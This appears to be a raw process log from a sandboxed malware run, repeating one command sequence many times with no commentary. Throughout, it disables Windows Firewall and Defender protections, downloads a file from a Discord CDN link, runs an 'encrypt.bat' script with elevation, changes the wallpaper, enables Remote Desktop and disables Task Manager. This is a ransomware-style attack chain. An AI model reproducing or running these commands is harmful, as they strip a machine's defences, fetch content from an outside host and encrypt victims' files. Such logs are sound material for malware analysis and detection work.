C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

